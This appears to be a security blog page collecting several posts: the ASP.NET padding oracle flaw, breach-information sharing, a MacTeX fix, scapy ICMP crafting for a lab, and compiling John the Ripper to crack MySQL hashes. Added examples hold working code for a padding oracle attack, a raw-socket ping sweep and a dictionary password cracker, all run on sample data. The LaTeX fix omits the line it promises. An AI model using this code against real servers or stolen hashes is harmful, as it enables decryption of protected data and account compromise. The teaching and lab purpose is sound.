Kind of reminds me of this story. And this picture of a mini SQL injection:
Microsoft has confirmed that millions of ASP.NET web applications are vulnerable to an attack that could potentially let an attacker decrypt data and read arbitrary files on the remote web server. The vulnerability is a padding oracle in the .NET framework: the server's error responses reveal whether a tampered CBC ciphertext decrypted to valid padding, and that one bit of feedback per request is enough to decrypt the ciphertext byte by byte without ever knowing the key. Details here, tool (POET) here.
Microsoft will have to patch every supported version of Windows, from XP Service Pack 3 and Server 2003 to Windows 7 and Server 2008 R2, as well as other products, including its IIS and SharePoint server software. They have also released a tool to test for vulnerable web applications. That will definitely be included in my pentest kit.
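To make the mechanism concrete, here is a self-contained padding oracle attack. This is an added example, not Microsoft's, the POET tool's, or this blog's own code. To run with the standard library only it uses a toy 16-byte block cipher (a four-round Feistel network with SHA-256 as the round function) as a stand-in for AES; the CBC mode, the PKCS#7 padding check and the attack are the real thing, and the attack never looks inside the block cipher, so it works identically against AES-CBC. The oracle is a local function here; in the real vulnerability it is the web server's differing responses.

```python
import hashlib
import os

BLOCK = 16  # block size in bytes, as for AES-CBC


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy keyed block cipher (assumption: a stand-in for AES so the example needs no
# third-party library). 4-round Feistel network, SHA-256 as round function.
def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, cur), prev))
        prev = cur
    return b"".join(out)


def padding_oracle(key: bytes, iv: bytes, ciphertext: bytes) -> bool:
    """The leak: the server answers differently when the padding is invalid."""
    try:
        unpad(cbc_decrypt(key, iv, ciphertext))
        return True
    except ValueError:
        return False


def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block with the oracle only: learn I = D_k(target)
    byte by byte from the right by forging the preceding block, then P = I xor prev."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padv  # known bytes forced to decrypt to the pad value
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte could be \x02\x02 (etc.) rather than \x01:
                # for a real \x01 the byte before it must not matter.
                forged[pos - 1] ^= 0xFF
                ok = oracle(bytes(forged), target)
                forged[pos - 1] ^= 0xFF
                if not ok:
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a guess; not a padding oracle?")
    return _xor(bytes(inter), prev)


def padding_oracle_attack(oracle, iv: bytes, ciphertext: bytes) -> bytes:
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return unpad(plain)


def demo(message: bytes = b"secret=viewstate; file=web.config") -> bytes:
    """Constructed demo: encrypt under a random key, then recover the plaintext
    from the ciphertext, the IV and the oracle alone (the attacker never sees key)."""
    key, iv = os.urandom(16), os.urandom(16)
    ciphertext = cbc_encrypt(key, iv, pad(message))
    oracle = lambda iv_, ct_: padding_oracle(key, iv_, ct_)
    return padding_oracle_attack(oracle, iv, ciphertext)


if __name__ == "__main__":
    print(demo())
```

The cost is at most 256 oracle queries per byte, which is why the attack is practical over HTTP. The fix is not a better block cipher but removing the oracle: authenticate the ciphertext (a MAC checked before decryption) and return one uniform error for every decryption failure.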
This goes back to the bear in the woods analogy, which I personally hate. The story goes that you don’t have to run faster than the bear, you just have to run faster than the guy next to you. While that’s a funny story, it only works if there are two people and you only encounter one bear. In a true ecosystem you have many people in the same business, and you have many attackers. If you leave your competitor(s) out to dry that may seem good for you in the short term, but in reality you’re feeding your attacker(s). Ultimately you are allowing the attacker ecosystem to thrive by not reducing the total amount of fraud globally. Yes, this means that if you really care about fixing your own problem you have to help your competitors.
This reminded me of the book The New School of Information Security, which I read a couple of years ago. While it was a quick read, it made a convincing point about why people within information security should share [statistics of] their incidents and hacker attacks. This resonates well with RSnake’s reasoning above: in a hostile environment, the best way to reduce the hostility is to cooperate; if not, you’re feeding the troll.
However, my personal experience indicates that few information security incidents are publicly reported. Sure enough, a couple of days later RSnake posted this post, confirming my suspicion. How can the total number of incidents go down when everybody in the infosec community reports the opposite?
I think IT and information security people should be more eager to share information about breaches and far less concerned about their company’s good name and “zero incidents” reputation. If we were more focused on sharing data about the incidents, malware attacks and fraud attempts we’re experiencing, that would truly make a difference. That way we could actually gather real-time statistics on what businesses are really facing, both externally and internally. Sharing this information with everyone would potentially reduce the hostility of the surrounding environment, or at least make it harder for the bad guys out there to survive.
Large parts of the community already feel that openness is essential to security. I think a willingness to share real-time information on internal and external security trends will be vital in the future.
Old, but still interesting: Deutsche Post has announced to the entire information security community that they are invited to try to hack a new Deutsche Post web application, and has thrown in a not insignificant amount of € for any bugs discovered. That’s a pretty bold and proactive IT security strategy if you ask me.
The touted anti-censorship software Haystack, which was supposed to keep Iranians safe from their government, seems to have been brewed from purified snake oil: over the last couple of days several researchers have torn the security of the Haystack software apart, and from the looks of it, it wasn’t a challenge at all.
I tried installing LaTeX using the MacTeX distribution, but had trouble using it with the excellent text editor TextMate: it simply could not find pdflatex or any of the other binaries needed to compile my paper. The error message I got was simply
pdflatex not found
After some fumbling I was able to specify the whereabouts of pdflatex by using TextMate’s shell variables (Under Preferences->Advanced), only to find that it still could not find the needed binaries:
kpsewhich: command not found
The LaTeX bundle manual indicated that the MacTeX installer should modify the PATH environment variable, but it did not modify mine. The solution was to modify /etc/profile’s PATH variable by changing
Log in and out, and test it by pressing Command-R in TextMate. Voila!
I wanted to learn how to use scapy, specifically to craft some packets that could confuse IDS operators at a blue team/red team exercise at SANS Boston. Now, I’ve used packETH for this before (and it works like a charm), but I wanted to learn something that could be scripted on the command line.
So I installed scapy from the Ubuntu repositories (or I could have fetched it from the above link). I wanted to play around and craft some ICMP ping packets with custom payloads, just to see if the IDS guys in the other room were really listening on the wire:
ans,unans = sr(IP(dst="10.246.144.1-254")/ICMP()/"PING! If you can read this, you're on the *wrong* OSI layer. O_o Zombies ahead!! Greetings from the SEC542 class")
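The one-liner above hides what scapy is doing on the wire. The following is an added example, not code from the original post or from the scapy project: it builds the same ICMP echo request in plain Python (header, RFC 1071 checksum, custom payload), parses it back the way an IDS sees it, and sends it over a raw socket. Assumptions: sending needs root or CAP_NET_RAW; the range expander handles scapy's `x-y` notation on the last octet only; the hosts and payload text are constructed sample input.

```python
import socket
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words.
    Over a packet whose checksum field is already filled in it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Same echo request scapy's IP()/ICMP()/payload produces, minus the IP header."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_icmp(packet: bytes) -> dict:
    """What the IDS sees: header fields plus the raw payload a content rule would match."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": typ, "code": code, "id": ident, "seq": seq,
            "checksum_ok": icmp_checksum(packet) == 0, "payload": packet[8:]}


def expand_last_octet(spec: str) -> list:
    """Expand scapy-style 'a.b.c.x-y' into host strings (assumption: last octet only)."""
    prefix, last = spec.rsplit(".", 1)
    lo, _, hi = last.partition("-")
    hi = hi or lo
    return [f"{prefix}.{i}" for i in range(int(lo), int(hi) + 1)]


def ping(dst: str, payload: bytes, timeout: float = 1.0) -> bool:
    """Send one echo request and wait for the reply (needs root / CAP_NET_RAW)."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        s.settimeout(timeout)
        s.sendto(build_icmp_echo(payload), (dst, 0))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return False
    ihl = (data[0] & 0x0F) * 4  # raw IPPROTO_ICMP sockets hand back the IP header too
    reply = parse_icmp(data[ihl:])
    return reply["type"] == ICMP_ECHO_REPLY and reply["payload"] == payload


# Constructed sample payload, in the spirit of the one in the post.
PAYLOAD = b"PING! If you can read this, you're on the *wrong* OSI layer. Greetings from the SEC542 class"

if __name__ == "__main__":
    for host in expand_last_octet("10.246.144.1-254"):
        print(host, "answered" if ping(host, PAYLOAD) else "no reply")
```

A quick sanity check before sending: `parse_icmp(build_icmp_echo(PAYLOAD))["checksum_ok"]` must be true, otherwise the target's stack drops the packet silently and the IDS may never log it either. The payload is exactly the bytes a content-matching rule on the sensor would have to look for, which is the whole point of the exercise.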
I’m attending the SANS SEC542 course this week in Boston, and during one of the exercises I managed to extract some MySQL password hashes via a SQL injection.
Needless to say, I wanted to get the passwords for the database users, so I thought I’d feed the hashes to my trusty friend John the Ripper for some serious cracking. But since version 4.1, MySQL has used a stronger hash than the old 16-hex-digit one, namely a double SHA-1: SHA1(SHA1(password)), stored as 40 upper-case hex digits prefixed with “*” (41 characters in total). It is still unsalted and fast, so dictionary attacks stay cheap, but John 1.7.6 does not support this format out of the box.
So here’s how you recompile John with the so-called “jumbo patch” to enable cracking of MySQL >= 4.1 password hashes (and loads of other hashing algorithms as well) on Ubuntu:
First, make sure that you have the necessary build tools, kernel headers and the OpenSSL development library:
sudo apt-get install build-essential linux-headers-$(uname -r) libssl-dev
Now we need to fetch the latest source code for John (1.7.6 at the time of writing), so switch into a suitable working directory and get it from openwall.com as shown here:
cd
mkdir src
cd src/
mkdir john-bigpatch
cd john-bigpatch/
wget http://openwall.com/john/g/john-1.7.6.tar.gz
tar xvf john-1.7.6.tar.gz
The last command expands the fetched archive and creates a folder called john-1.7.6; cd into it and get the corresponding “jumbo patch”:
cd john-1.7.6/
wget http://openwall.com/john/contrib/john-1.7.6-jumbo-6.diff.gz
gunzip john-1.7.6-jumbo-6.diff.gz
Now we’ll patch John up and compile the patched version:
patch -p1 < john-1.7.6-jumbo-6.diff
cd src/
make clean linux-x86-any
If you’re on a 64-bit platform, use the linux-x86-64 target instead; this fixed compiling for me on my laptop:
make clean linux-x86-64
That’s it. Now John is ready to chew on password files with MySQL 4.1+ hashes (one “user:*HASH” per line):
cd ../run/
./john hashes.txt
The simple command above is just the start: it will try “single crack” mode first, then use a wordlist with rules, and finally go for “incremental” mode. If John guesses the hash type wrong, tell it explicitly with --format=mysql-sha1, the jumbo patch’s label for MySQL 4.1+ hashes. Check out these great tutorials or the documentation to learn more on how to utilize John to his full potential. Happy cracking!
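To see what John is actually attacking, here is an added example (my own code, not the blog's and not John the Ripper's): it computes MySQL 4.1+ hashes the way PASSWORD() does, recognises the hash style in a dump, and runs a minimal wordlist-with-rules attack of the kind John performs in its second mode. The dump and the wordlist are constructed sample data, and the rule set is a hand-picked subset standing in for John's rules.

```python
import hashlib
import re

MYSQL41_RE = re.compile(r"^\*[0-9A-F]{40}$")        # MySQL >= 4.1 (john: mysql-sha1)
MYSQL_OLD_RE = re.compile(r"^[0-9a-f]{16}$", re.I)  # pre-4.1 16-hex-digit hash


def mysql41_hash(password: str) -> str:
    """MySQL >= 4.1 PASSWORD(): '*' + hex(SHA1(SHA1(password))).
    The inner digest is fed in as raw bytes, not as a hex string."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify(h: str) -> str:
    """Which John format label a hash needs; 'unknown' if it is neither MySQL style."""
    h = h.strip()
    if MYSQL41_RE.match(h.upper()):
        return "mysql-sha1"
    if MYSQL_OLD_RE.match(h):
        return "mysql-old"
    return "unknown"


def parse_dump(text: str) -> list:
    """'user:hash' lines, the input shape John expects; blanks and # comments skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, h = line.partition(":")
        entries.append((user, h.strip()))
    return entries


def mangle(word: str):
    """A few mangling rules of the kind John applies to every wordlist entry."""
    seen = set()
    for cand in (word, word.capitalize(), word.upper(),
                 word + "1", word.capitalize() + "1", word + "123"):
        if cand not in seen:
            seen.add(cand)
            yield cand


def crack(entries: list, wordlist: list) -> dict:
    """Unsalted + fast means: hash each candidate once, look it up against every target."""
    targets = {}
    for user, h in entries:
        if classify(h) == "mysql-sha1":
            targets.setdefault(h.upper(), []).append(user)
    found = {}
    for word in wordlist:
        for cand in mangle(word):
            for user in targets.get(mysql41_hash(cand), ()):
                found[user] = cand
    return found


# Constructed sample dump (not real data); the 4.1+ hashes are computed here from
# known passwords, the 'legacy' line is an arbitrary pre-4.1 style value.
SAMPLE_DUMP = "\n".join([
    "# user:hash",
    "root:" + mysql41_hash("password"),
    "app:" + mysql41_hash("Summer1"),
    "backup:" + mysql41_hash("password"),  # same password, identical hash: no salt
    "legacy:7a6f5b3c2d1e0f9a",
])
WORDLIST = ["letmein", "summer", "password", "admin"]


def demo() -> dict:
    return crack(parse_dump(SAMPLE_DUMP), WORDLIST)


if __name__ == "__main__":
    for user, pw in demo().items():
        print(f"{user}: {pw}")
```

Two things worth noticing: `root` and `backup` share a hash, so one lookup cracks both (no salt), and `legacy` is never attempted because it is a different format, which is exactly when you would run John a second time with a different --format.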
Hello world, and welcome to my blog about security, hacking and technology in general.